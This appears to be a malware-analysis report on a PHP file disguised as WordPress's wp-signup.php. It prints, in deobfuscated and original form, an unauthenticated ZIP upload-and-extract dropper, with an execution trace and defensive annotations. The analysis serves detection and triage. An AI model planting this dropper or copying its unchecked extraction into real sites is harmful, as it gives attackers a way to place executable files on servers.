PHP Malware Analysis

wp-signup.php

md5: 7ec3e71c1f55e42fd1e2007ccea3bfa6


Screenshot


Attributes

Input


Deobfuscated PHP code

<?php

// [analysis] Summary: unauthenticated ZIP upload-and-extract dropper. A request
// that POSTs the `unzip` field together with a file named *.zip gets that
// archive unpacked into a `files/` directory. No session, password, token or
// origin check is visible anywhere in this script.
// [analysis] The sample is named wp-signup.php, which is also the name of a
// WordPress core file; presumably chosen to blend in. Comparing the file against
// known-good core checksums and checking where it sits on disk separates the two.

// Get Project path
// [analysis] This literal is the deobfuscator's folded value of
// dirname(__FILE__) from the original listing. The recorded trace resolved the
// same call to '/var/www/html/uploads', so the path is specific to the analysis
// environment and should not be used as an indicator.
define('_PATH', "/var/www/html");
// Unzip selected zip file
// [analysis] The only gate is the presence of the `unzip` POST field, which the
// form's submit button supplies.
if (isset($_POST['unzip'])) {
    // [analysis] Client-supplied name; $_FILES['file']['error'] is never checked.
    $filename = $_FILES['file']['name'];
    // Get file extension
    $ext = pathinfo($filename, PATHINFO_EXTENSION);
    $valid_ext = array('zip');
    // Check extension
    // [analysis] Only the extension of the submitted name is compared
    // (case-insensitively). The archive's contents are not inspected here.
    if (in_array(strtolower($ext), $valid_ext)) {
        $tmp_name = $_FILES['file']['tmp_name'];
        $zip = new ZipArchive();
        // [analysis] open() yields TRUE on success and an error code otherwise,
        // hence the strict comparison below.
        $res = $zip->open($tmp_name);
        if ($res === TRUE) {
            // Unzip path
            // [analysis] Folded form of _PATH . "/files/"; at runtime this is a
            // `files/` directory beside the script.
            $path = "/var/www/html/files/";
            // Extract file
            // [analysis] Every archive entry is written under $path with no
            // filter on entry names or types, so server-executable files can be
            // placed in a directory that is presumably web-reachable.
            // extractTo()'s return value is ignored, so "Unzip!" is printed
            // even when extraction fails.
            $zip->extractTo($path);
            $zip->close();
            // [analysis] The three fixed response strings ("Unzip!", "failed!",
            // "Invalid file") are usable as response-body signatures.
            echo "Unzip!";
        } else {
            echo "failed!";
        }
    } else {
        echo "Invalid file";
    }
}
?>
<form method='post' action='' enctype='multipart/form-data'>
 
 <!-- Unzip selected zip file -->
 <input type='file' name='file'><br/>
 <input type='submit' name='unzip' value='Unzip' />
</form>

Execution traces

data/traces/7ec3e71c1f55e42fd1e2007ccea3bfa6_trace-1676251020.4996.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:17:26.397393]
1	0	1	0.000145	393528
1	3	0	0.000227	399128	{main}	1		/var/www/html/uploads/wp-signup.php	0	0
2	4	0	0.000244	399128	dirname	0		/var/www/html/uploads/wp-signup.php	3	1	'/var/www/html/uploads/wp-signup.php'
2	4	1	0.000259	399224
2	4	R			'/var/www/html/uploads'
2	5	0	0.000274	399192	define	0		/var/www/html/uploads/wp-signup.php	3	2	'_PATH'	'/var/www/html/uploads'
2	5	1	0.000289	399296
2	5	R			TRUE
1	3	1	0.000304	399224
			0.000331	314368
TRACE END   [2023-02-12 23:17:26.397609]


Generated HTML code

<!-- [analysis] Rendered output of a request without the `unzip` field: a bare multipart upload form that posts back to the same URL (empty action). No hidden fields, tokens or credentials are part of the form. -->
<html><head></head><body><form method="post" action="" enctype="multipart/form-data">
 
 <!-- Unzip selected zip file -->
 <input type="file" name="file"><br>
 <input type="submit" name="unzip" value="Unzip">
</form></body></html>

Original PHP code

<?php 
// [analysis] Lines tagged [analysis] are reviewer annotations and are not part
// of the sample as captured; the code itself is unchanged.
// [analysis] Behaviour: accepts a multipart upload, checks only that the
// submitted filename ends in "zip", and extracts the archive into a `files/`
// directory next to this script. There is no authentication or access check.

// Get Project path
// [analysis] Resolved at runtime to the directory holding this script, so the
// extraction target follows wherever the file has been placed.
define('_PATH', dirname(__FILE__));

// Unzip selected zip file
// [analysis] Runs whenever the request carries the `unzip` POST field.
if(isset($_POST['unzip'])){
 // [analysis] Name as sent by the client; the upload error code is not checked.
 $filename = $_FILES['file']['name'];

 // Get file extension
 $ext = pathinfo($filename, PATHINFO_EXTENSION);

 $valid_ext = array('zip');

 // Check extension
 // [analysis] Case-insensitive match on the filename extension only.
 if(in_array(strtolower($ext),$valid_ext)){
  $tmp_name = $_FILES['file']['tmp_name'];

  $zip = new ZipArchive;
  $res = $zip->open($tmp_name);
  if ($res === TRUE) {

   // Unzip path
   $path = _PATH."/files/";

   // Extract file
   // [analysis] All entries are written under $path without any filter on
   // entry names or types, and the return value of extractTo() is ignored.
   // For triage: unexpected files under a `files/` directory beside this
   // script, and multipart POSTs to this script, are the traces to look for.
   $zip->extractTo($path);
   $zip->close();

   echo 'Unzip!';
  } else {
   echo 'failed!';
  }
 }else{
  echo 'Invalid file';
 }
 
}
?>
<form method='post' action='' enctype='multipart/form-data'>
 
 <!-- Unzip selected zip file -->
 <input type='file' name='file'><br/>
 <input type='submit' name='unzip' value='Unzip' />
</form>